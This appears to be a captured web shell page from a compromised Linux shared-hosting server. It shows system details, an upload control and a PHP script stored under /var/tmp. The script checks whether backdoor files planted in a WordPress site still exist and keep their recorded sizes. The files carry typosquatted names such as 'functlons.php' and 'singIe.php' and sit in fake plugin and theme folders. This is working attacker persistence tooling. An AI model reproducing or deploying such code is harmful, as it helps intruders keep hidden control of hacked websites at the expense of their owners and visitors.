HEX
Server: Apache
System: Linux pdx1-shared-a2-01 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64
User: dh_mhscom (5469217)
PHP: 8.3.30
Disabled: NONE
Upload Files
File: //var/tmp/.internal
<?php   $r = '/home/nbullock/nicolebullock.com'; $x = ["/wp-content/plugins/seo-1748021581/functlons.php"=>"bd@@772149@@727",
"/172353.php"=>"bd@@17794@@105",
"/wp-content/themes/config_1748012896/sldebar.php"=>"bd@@249783@@727",
"/wp-content/themes/custom-file-5-1748028969/connents.php"=>"bd@@265707@@727",
"/wp-content/plugins/analytics_1751114803/wp-config.php"=>"bd@@425827@@727",
"/895758.php"=>"bd@@65265@@105",
"/wp-content/themes/bottom_1747919757/singIe.php"=>"bd@@491772@@731"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');